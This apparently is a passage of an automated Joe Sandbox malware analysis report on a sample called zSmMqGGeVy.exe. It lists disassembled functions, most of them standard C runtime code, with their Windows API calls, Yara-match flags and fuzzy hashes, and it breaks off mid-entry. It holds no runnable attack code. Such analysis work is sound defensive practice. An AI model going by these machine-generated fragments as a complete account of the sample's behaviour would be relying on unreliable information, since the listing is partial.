                                                  • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                  • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                  Function 00EA72E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00EA72B1: _free.LIBCMT ref: 00EA72D6
                                                  • _free.LIBCMT ref: 00EA7337
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA7342
                                                  • _free.LIBCMT ref: 00EA734D
                                                  • _free.LIBCMT ref: 00EA73A1
                                                  • _free.LIBCMT ref: 00EA73AC
                                                  • _free.LIBCMT ref: 00EA73B7
                                                  • _free.LIBCMT ref: 00EA73C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                  • Instruction ID: 8710b0400b4eb085f4f78d05bc91e3f1d5c21578244cf19e7bd17a30d08eea40
                                                  • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                  • Instruction Fuzzy Hash: FF114FB5544B18AAD920F7B0CC47FCB7BDDAF4E700F401825F2E97E062DA65B5144671
                                                  Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                  • _free.LIBCMT ref: 1000C60D
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C618
                                                  • _free.LIBCMT ref: 1000C623
                                                  • _free.LIBCMT ref: 1000C677
                                                  • _free.LIBCMT ref: 1000C682
                                                  • _free.LIBCMT ref: 1000C68D
                                                  • _free.LIBCMT ref: 1000C698
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                  • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                  Function 00417CD3 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                  • __fassign.LIBCMT ref: 00417EFA
                                                  • __fassign.LIBCMT ref: 00417F17
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                  • String ID:
                                                  • API String ID: 4031098158-0
                                                  • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                  • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                  • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                  • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                  Function 00EA7F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 00EA7F82
                                                  • __fassign.LIBCMT ref: 00EA8161
                                                  • __fassign.LIBCMT ref: 00EA817E
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA81C6
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EA8206
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA82B2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                  • String ID:
                                                  • API String ID: 4031098158-0
                                                  • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                  • Instruction ID: cb1242522603102afb0c0946be59201f39fc2c7cbd8cd9547608fd4efc616393
                                                  • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                  • Instruction Fuzzy Hash: 7DD1BD71D016489FCF15CFE8C980AEDBBB5FF49304F281169E855BB252DB31AA46CB60
                                                  Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                  • __fassign.LIBCMT ref: 1000B905
                                                  • __fassign.LIBCMT ref: 1000B922
                                                  • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                  • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                  Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                  • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                  • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                  Function 00E9B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00E9B002,00E9A5C6,00E99C00), ref: 00E9B019
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E9B027
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E9B040
                                                  • SetLastError.KERNEL32(00000000,00E9B002,00E9A5C6,00E99C00), ref: 00E9B092
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction ID: 6f2de632e6216d4b1a199b8a0a4475d0a422dd1ec9adf97f7efc2c65dea99885
                                                  • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction Fuzzy Hash: A5018832609711AFAE342FB57D859972794EB0177C7301239F524B61F2EF594C125144
                                                  Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                  • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                  • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                  Function 00415B18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                  • Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
                                                  • Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                  • Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94
                                                  Function 00EA5D7F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                  • Instruction ID: 82d2ef4a4de003e7697152d43fb8ed1b944d2aa4c8da6506cdc5e90fa603429b
                                                  • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                  • Instruction Fuzzy Hash: 95613876E006199FCB14DFA8C8815EEFBF5EF4D314B2591AAE815FB340D631AE418B90
                                                  Function 00EA6383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Users\user\Desktop\zSmMqGGeVy.exe, xrefs: 00EA6388
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                  • Instruction ID: 37df6c1edc425f0742f1cbecb465762b3d9c20e0df801dd5f46ad83c57e42402
                                                  • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                  • Instruction Fuzzy Hash: 8A21B0B1600105BF9F20BF618D858AB77ADAB4F3A8719A524F529EA150E721FD018760
                                                  Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Users\user\Desktop\zSmMqGGeVy.exe, xrefs: 1000833B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                  • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                  Function 0040BE17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-
                                                  • API String ID: 3664257935-2084034818
                                                  • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                  • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                  Function 0040EF4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF64
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                  • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                  • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                  • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                  Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                  • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                  • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                  Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                  • __alloca_probe_16.LIBCMT ref: 1000A736
                                                  • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                  • __freea.LIBCMT ref: 1000A837
                                                  • __freea.LIBCMT ref: 1000A843
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __alloca_probe_16__freea$Info
                                                  • String ID:
                                                  • API String ID: 2330168043-0
                                                  • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                  • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                  • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                  • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                  Function 004136A0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 00413724
                                                  • __alloca_probe_16.LIBCMT ref: 004137EA
                                                  • __freea.LIBCMT ref: 00413856
                                                    • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                  • __freea.LIBCMT ref: 0041385F
                                                  • __freea.LIBCMT ref: 00413882
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1423051803-0
                                                  • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                  • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                                  • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                  • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                                  Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                  • __alloca_probe_16.LIBCMT ref: 1000B101
                                                  • __freea.LIBCMT ref: 1000B16D
                                                    • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  • __freea.LIBCMT ref: 1000B176
                                                  • __freea.LIBCMT ref: 1000B199
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1423051803-0
                                                  • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                  • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                  • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                  • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                  Function 00E92BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 00E92C5F
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00E92C74
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00E92C82
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00E92C9D
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00E92CBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                  • String ID:
                                                  • API String ID: 2509773233-0
                                                  • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                  • Instruction ID: e62081e3a4cfa2acbfe5cdb75c654f8a09f96cd2561268d68cc474727a6002d0
